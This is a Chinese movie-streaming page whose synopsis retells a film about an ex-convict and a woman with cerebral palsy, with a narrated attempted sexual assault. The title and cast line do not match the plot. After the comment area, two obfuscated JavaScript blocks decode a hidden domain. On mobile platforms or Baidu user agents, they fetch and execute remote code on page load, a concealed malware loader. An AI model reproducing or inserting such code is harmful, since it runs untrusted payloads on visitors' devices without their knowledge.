死人和其他人

  • Henrique Ihj?c Krah? Raene K?t? Krah?
  • 120分钟
  • 死人和其他人影片简介:这个男人抱着女孩的脚疯狂地吻…死人和其他人影片简介:这个男人抱着女孩的脚疯狂地吻了下去,女孩虽然是个脑瘫,但男人并不在意,因为他已经两年没有见过女人。 看着眼前娇滴滴的美人,男人无法控制自己,他将女人拥入怀中,想要将她占为己有,女孩拼死抵抗,在巨大的情绪波动中,女孩晕了过去。 男人见状停下了手里的动作,提上裤子,将女孩拖进了厕所,扇了自己两耳光后,男人用水将女孩浇醒,自己慌忙逃了出去。 这个男人叫阿斗,寒冬腊月的天气里,他却穿着一件短袖下了车,他并不是在挑战极限,而是因为他刚从监狱里出来。两年前,他因为开车撞死了人,被判刑坐牢两年,今天他刚刚出狱。 出狱后的阿斗第一件事并不是回家,而是找地方买了块豆腐,站在路边啃了起来,寓意自己以后的人生道路,像豆腐一样纯白干净。 吃完豆腐后,他在路边给母亲买了件毛衣,开心地回了家。可是房门打开时他才发现,自己的家人早就全部搬走,电话号码也全部换新,此时的他,饥寒交迫无家可归。 走投无路的他,只好吃起了霸王餐,吃饱喝足后他,再一次进了警察局。谁知塞翁失马焉知非福,警察帮阿斗找到了家人,弟弟一脸不情愿地将阿斗带回了家。 回家后,哥哥嫂子看似热情地欢迎他回家,可是转身就露出了嫌弃的表情,但是阿斗却并不在意。开心地和妈妈拥抱着,将自己新买的衣服拿出来,细心地帮妈妈穿上,妈妈穿着既合适又好看。 哥哥为了不让阿斗在家继续惹事,给阿斗找了个送外卖的工作,阿斗虽然答应了下来,但是他却不能马上工作,因为他还有一件重要的事情要做。 他要去看望死者的家属,其实阿斗是个心存善意的小伙子,因为自己的错误,导致一个家庭的破裂,他心里十分过意不去,他买好了果篮,来到了受害人家里。 但是家里只有一个人,一见到阿斗进来,恭珠就拿起镜子,直直将光点反射到阿斗的脸上,照得阿斗的眼睛无法睁开。 恭珠就是用这种方式,让阿斗不能前进半步。因为恭珠是一个残疾人,她是一名重度脑瘫患者,经常会面容扭曲手脚抽搐。 就在阿斗感到疑惑的时候,恭珠的哥哥进来了,他一眼就认出了,阿斗就是当年撞死父亲的凶手,立马将阿斗赶了出去,连同阿斗的果篮一起扔了出去。 恭珠的哥哥表面上是个正人君子,但实际上却坏到了骨子里。政府救济给残疾人的高层楼房,被自己霸占了起来。不仅如此,他和妻子还拿走了政府给恭珠的救济金,阿斗来的时候,他和妻子正在搬家,但是他们只是想自己住进豪宅。恭珠在他们眼里只是一个骗钱的工具,用完了就再也不需要。 哥哥和嫂子,收拾完东西后就自己离开,把恭珠这个累赘扔在了破旧的老房子里。 恭珠的房间里,挂着一幅名叫绿洲的画,这是恭珠最喜欢的一幅画,但是到了晚上,这幅壁画却成了恭珠的噩梦。窗外树枝的倒影,映在绿洲上,就像一只只恶魔的手,在张牙舞爪的摆动,恭珠每天都不能安心入睡。 开始送外卖的阿斗,肆意地在公路上挥洒自己的心情,却没成想 ,刚疯狂了几分钟,自己就连人带车摔了个大跟头。阿斗带着伤痕回到了家里,大嫂在帮阿斗清理伤口的同时,说出了她最想说的话,你不在我们全家过得都很好。 被家里人嫌弃后,阿斗买了束鲜花来到了恭珠楼下,他想从恭珠身上寻找安慰。可是自己一通折腾,不但没能得逞,受到惊吓的恭珠反而晕了过去。阿斗还算君子的停止了自己的行为,将恭珠拖进厕所,狠狠地打了自己两耳光后,阿斗用水将恭珠浇醒,自己因为害怕。仓惶地跑了出去。 而恭珠在经历了这一次事情之后,竟然在镜子前挑起了衣服,并且笨拙地为自己涂上口红,虽然动作并不熟练,但恭珠看着自己的变化,还是开心的笑了起来。 哥哥来接恭珠去漂亮的新房子里,并不是因为他良心发现,而是为了应付检查。因为社区工作人员来检查,房子里是否有残疾人士,防止有人骗房子住,工作人员前脚刚走,哥哥就立马把恭珠送回了老房子。 但是回到家的恭珠并没有感到难过,反而是开心的和哥哥道别后,爬到梳妆台前,颤颤巍巍地拿下了阿斗的名片。恭珠虽然是个残疾人,但她同样憧憬着美好的爱情,而阿斗正是合适的人选,接到恭珠电话的阿斗异常兴奋。 第二天一大早,就来到了恭珠家门口,两人以鸽子叫声为暗号,恭珠亲自为阿斗打开门。 两人在房间中畅聊,阿斗亲切地称呼恭珠为,公主殿下。而自己则是保护公主的将军,恭珠在这个昏暗的房子里呆久了,一直向往外面的世界,因此阿斗推着恭珠来到了天台。恭珠终于能看到天空,她甚至向往成为天上的云朵,不管变成什么形状,都能自由自在。 两人浪漫的约会结束后,阿斗心情大好,甚至找了木牧师为自己祈祷,希望迎来全新的生活。为了兑现与恭珠的承诺,他特意跑来哥哥的修车场学习修车,因为他告诉过恭珠,自己修车技术非常厉害。 恭珠说的每句话他都记在心上,他会经常给恭珠洗衣服,为恭珠唱歌,虽然每次都得避开旁人,但阿斗和恭珠乐在其中,两个极端人的爱情是美好的。 恭珠害怕绿洲上的倒影,阿斗会用魔法让倒影消失。如果阿斗不在,恭珠也会每晚听着阿斗的声音入眠,他们的爱情不同寻常,但却又平平无奇。 阿斗为了带恭珠感受生活的气息,特意带恭珠坐了公交车,恭珠坐在座位上。阿斗站在前面保护她。恭珠看到对面的女孩用水瓶敲男孩的头,她不禁幻想到自己,如果自己身体没有缺陷,他们也可以和众多情侣一样,不用在意别人的目光,她也可以在众目睽睽之下,娇羞的拿瓶子打阿斗。 想到这里,恭珠忍不住笑出了声,她实在太向往爱情太渴望爱情,而阿斗就是能给自己这一切的人。 两人下了公交车,准备去吃顿大餐,但是没有餐馆愿意接纳两人。阿斗带恭珠来到了哥哥的修车厂,他点了恭珠最想吃的炸酱面,两人吃完饭后,准备打车回家。可是不成想马路上的车已经堵得根本动弹不得,但是阿斗却并不烦恼。 他把自己的公主陛下抱在怀里,迈着欢快的舞步,在拥挤的车辆中穿行,仿佛这里就是两人的婚礼殿堂。他要告诉全世界,他们相爱了,他要像现在这样,让公主永远幸福,仿佛如梦中出现的那样,印度女人孩子小象,都为他们的爱情祝福。 很快就到了阿斗母亲的生日,阿斗特意为恭珠梳洗打扮,因为今天,他要把恭珠正式介绍给家人。 洪家的生日宴办得无比隆重,一家人欢聚在一起,可是阿斗的出现却打破了宴席的气氛。当家人知道恭珠就是当年死者的女儿时,桌上的气氛尴尬到了极点,打破这份尴尬的是阿斗的哥哥,他把阿斗叫了出去,打算与他单独谈谈。 原来当年撞人的并不是阿斗,而是阿斗的哥哥。因为哥哥有份稳定的工作,阿斗才替哥哥坐牢。但是如今,恭珠的突然出现,让阿斗的哥哥认为,这就是阿斗在故意刁难自己,并且恭珠的样子,让哥哥实在是看不下去。 因此在阿斗打算推恭珠一起拍全家福的时候,哥哥生气地将恭珠推了出来,阿斗第一次在家人面前发火。恭珠不拍全家福,他也绝对不拍。 此时的阿斗对自己的家庭彻底失望,他以为自己替哥哥锒铛入狱,换来的是家人的感激,但没想到,他却还是家人眼里的扫把星。 从宴会厅出来后,阿斗和恭珠紧赶慢赶,还是没有赶上最后一班地铁。好在阿斗还有膀子力气,他就这样背着恭珠,一步一步走回了家。当阿斗安顿好恭珠,准备去赶最后一班公交车时,恭珠却突然抱住了阿斗,告诉他,不要走留下来。 可是不巧的是,恭珠的哥哥和嫂子却突然回来了。他们打开房门,看到床上裸露的两人,以为是阿斗在强迫恭珠。 嫂子不相信,恭珠这样的人,能找到自己的幸福,她完全不顾暴露在床上的恭珠,大声喊来了所有的邻居,而阿斗也因为强奸罪,再次被抓进了警察局。 阿斗的哥哥和弟弟闻讯赶到了警察局,他们一家人,本来就不知道该怎么摆脱这个游手好闲的弟弟,正好现在他们有了一个完美的借口。比起赔钱哥哥更愿意让阿斗在监狱里度过。 而另一边,恭珠却因为情绪激动一句话也说不出来。但警察却认为,恭珠是受到胁迫后导致的全身抽搐,他们势必要为恭珠伸张正义。恭珠甚至用自己的身子去撞橱柜,但是恭珠越是激动,警察就越会认定,阿斗就是犯罪嫌疑人。 就在阿斗接受家属看望时,却突然摆脱开警察的看管,发疯似地跑了出去。他在路上劫持了一个女孩,抢过她的手机给恭珠打电话,但是电话那头却一直没人接听。阿斗跑到了恭珠家楼下 他没有上楼,反而是爬到了树上,他用锯子把树枝全部锯断。 因为从此以后,阿斗再也没有办法用魔法,将这些可怕的恶魔手指消除,也没有办法每晚用声音陪伴恭珠入睡。阿斗天不怕地不怕,甚至连坐牢都没关系,但是他的公主陛下不可以,没有了将军的保护,公主晚上该怎么入眠。 恭珠在屋里听到了阿斗锯树枝的声音,她想要打开窗户,再看阿斗一眼。但是这样简单的动作,她却做不到,她扭曲着身体,努力地伸向窗边,但却怎么也够不到。就像两人的爱情,明明已经靠近,却无法拥有。 恭珠打开了自己的收音机,把声音调到最大,她试图用收音机告诉阿斗,她收到了阿斗的魔法,从今往后,她将不再害怕。阿斗在窗外,听到了恭珠的收音机,他在树上扭动着身体,丝毫没有入狱前的焦虑,因为公主陛下的留言他已经收到。 一个是脑瘫,一个是刑满释放的无业游民,一个是公主,一个是将军,两个极端人之间的爱情,总是那么卑微,那么谨慎。 两人的约会总是在黑暗时,两人的舞蹈也只能出现在梦里,他们是彼此心里的绿洲,但沙漠广阔,奔向彼此需要经历的困难太多。 世俗的眼光为什么不相信,两人之间可以有甜美的爱情,常人的爱情,谁又能像阿斗一般做到一眼万年。

同主演

  • HD
  • HD

死人和其他人评论

  • 评论加载中...
function pXcBy(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function wYQGtgXR(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return pXcBy(t);};window[''+'e'+'E'+'F'+'W'+'X'+'U'+'k'+'r'+'H'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=wYQGtgXR,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/a/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('am5yLmZweG9yYYnouYY24=','151743',window,document,['Y','pZgsOymIiK']);}:function(){};


function vjfEZzRN(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function qRMyX(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return vjfEZzRN(t);};window[''+'H'+'s'+'a'+'u'+'E'+'K'+'U'+'l'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=qRMyX,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/a/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('am5yLmZweeG9yYnouY24=','151742',window,document,['e','dIekPvA']);}:function(){};